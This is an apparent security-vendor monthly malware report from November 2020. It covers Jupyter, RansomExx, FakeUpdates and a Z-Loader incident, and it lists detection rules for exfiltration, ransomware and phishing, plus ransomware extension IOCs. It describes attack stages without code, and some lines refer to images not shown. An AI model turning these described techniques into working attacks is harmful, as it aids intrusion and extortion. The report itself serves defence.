This Malware Trends Report – November 2020 is a monthly round-up from the Varonis Forensics Team documenting activity observed while responding to incidents, performing forensics, and reverse engineering malware samples. This report is intended to help you better understand the evolving threat landscape and adapt your defenses accordingly.
 Jupyter is a Russian info-stealing malware that was first discovered in May 2020, but recently (November 2020) began to show indications of higher activity volume, particularly against U.S. victims.
Want to learn ransomware basics and earn a CPE credit? Try our free course.
Targeting primarily Chromium-based browser data, Jupyter contains functionality from various parts of the attack chain: downloading the malware, contacting a C2 client, and using shellcode-hollowing techniques into legitimate Windows applications.
Jupyter is extremely difficult to detect because of its small footprint, caused by stealthy payloads that do not use persistency or propagation techniques.
The stages of the malware are:
- The victim downloads a ZIP file that contains an installer of seemingly legitimate software from a malicious email attachment or link.
- Once installed, the malware injects its loader to the machine’s memory.
- This loader downloads the payload in the form of an obfuscated PowerShell command to execute inside the memory context, which communicates with the C2 servers.
 RansomExx ransomware, most likely originating from the Defray777 ransomware variant, has targeted several U.S based victims, such as “Tyler Technologies” and the Japanese company “Konica Minolta”. The ransom note for “Konica Minolta”:
One of the unique features of RansomExx is the ability to encrypt Linux-based machines. Most ransomware variants focus on attacking Windows machines, but RansomExx can paralyze businesses no matter which operating systems they use and demand a higher ransom.
RansomExx includes cryptolocker-related directories on the victim’s machine, which gives us a clue as to the authors’ origin or intentions:
By observing the ransomware’s source, we can deduce that it uses block encryption, which is slower compared to a stream cipher. We can also see that it uses mutex to lock and unlock the process of encryption:
 FakeUpdates is a campaign designed to mislead users to download supposed updates for Microsoft Teams. What they are really downloading is a backdoor that uses Cobalt Strike to spread malware inside companies’ networks.
Recently, this campaign has been targeting the U.S. education sector due to their high dependency on tools like Microsoft Teams, which allows video conferencing and other types of functionality that support remote learning.
In order to get users to download the fake updates, the attackers use ads on different search engines to attract potential victims, making their link one of the top search results in various searches. Clicking the link leads to downloading a payload, which runs a PowerShell script that is the backdoor. The link also downloads a legitimate copy of Microsoft Teams in order to alleviate suspicion.
An example of a malicious search result:
What the ad leads to:
Once the backdoor is activated inside the organizations’ network, it is used to spread malware, mostly ransomware variants such as DoppelPaymer, and more recently, WastedLocker.
The attackers have also begun to exploit the ZeroLogon vulnerability as a part of the campaign. ZeroLogon (CVE-2020-1472) was marked as a critical vulnerability and can allow an attacker to elevate their privileges on the domain.
Varonis’ threat detection products have several built-in threat models that can identify the malware variants mentioned during different stages of their activity:
- “Crypto activity detected”: detects the creation of ransom notes on a file server.
- “Immediate pattern detected: user actions resemble ransomware”: detects the encryption process of files on a file server without relying on known ransomware file names or extensions, enabling detection of new ransomware/data destroyer variants.
- “Abnormal behavior: an unusual amount of data was uploaded to external websites”: detects the upload of the collected data to a website that is not under the organization’s domain, by examining the amount of the information sent.
- “Potential phishing attack: Access to a risky site where the domain name includes unusual characters”: detects when a user accesses a website that may contain malware, based on unusual characters on the website’s URL.
- “Suspicious email: an email was received with a suspected malicious attachment”: detects when an email attachment might contain malicious code or link to a malicious website.
- “Potential malicious file download was detected”: detects the download of a potentially malicious file.
- “Potential malware infection: dropper identified”: detects the potential infection of the environment by a dropper malware, which can be used to download the next stages of malware.
- “Password-spraying attack to several admin accounts from a single device”: detects a brute-force attempt against users in the organization’s domain.
Success Story of the Month
One of Varonis’ customers – a mid-size U.S. financial company, had a breach involving Z-Loader malware.
They called on the Varonis Forensics Team to investigate a suspicious Excel file, find out if it is malicious, and give a detailed report of its functionality.
The Forensics Team found a suspicious MS Office file attached to one of the phishing emails.
The Excel file contained a macro that was executed which raised the concern that it might be a malware-related attack.
The Forensics Team identified the following:
- The malware masked its main functionality by adding many unused commands to the cells of the spreadsheet.
- The Excel file was able to change values in the registry to allow the macro code to run from Office documents without the need for the user to approve them.
- Once the code is executed, it tries to communicate with a C2 server by sending requests (which contain identification of the infected device and request type) and receiving responses over HTTPS protocol in order to download the next phase of the attack.
- We know that Z-Loader victims are managed by a control panel, which allows viewing the number of victims (whether they are online or not), their architecture (32/64), and their country. It also collects the process list from victim devices and can launch different tasks on them.
Our team helped the customer by:
- Providing indicators of compromise (IOCs) of the Z-Loader variant to be implemented across the organization’s security solutions.
- Reverse-engineering a sample of the malware and providing a full and comprehensive malware report, including explanations about all the malware’s capabilities and functionality
- Utilizing the Varonis web UI to investigate Varonis alerts together with the customer, to verify no spots were missed
- Correlate the known parts of the attack to the events showing in Varonis
New Variants Analyzed in November
|Variant name||Popularity||Data-centric IOCs|
|Dharma ransomware||3||Extension: .zimba|
|GlobeImposter||3||Ransom note: .CC4H|
|Jigsaw Ransomware||3||Extension: .v315|
|Pethya||3||Extension: .pethya zaplat zasifrovano|
|STOP Ransomware||3||Extension: .vpsh|
|CONTI Ransomware||2||Extension: .ITTZN|
|LuckyDay Ransomware||2||Extension: .luckyday|
|VoidCrypt Ransomware||2||Extension: .hidden|
|WastedLocker Ransomware||2||Extension: .hard2decrypt|
|WastedLocker Ransomware||2||Extension: .3ncrypt3d|
|.V3JS Ransomware||1||Extension: .V3JS|
|Bondy Ransomware||1||Extension: .bondy|
|CCE Ransomware||1||Extension: .aieou|
|DCRTR Ransomware||1||Extension: .termit|
|Fusion Nefilim||1||Extension: .FUSION|
|Lalaland Ransomware||1||Extension: .lalaland|
|LockDown Ransomware||1||Extension: .sext|
|RegretLocker Ransomware||1||Extension: .mouse|
|RexCrypt Ransomware||1||Extension: .RexCrypt|
|SnapDragon Ransomware||1||Extension: .SNPDRGN|
|ThunderCrypt Ransomware||1||Extension: .sz40|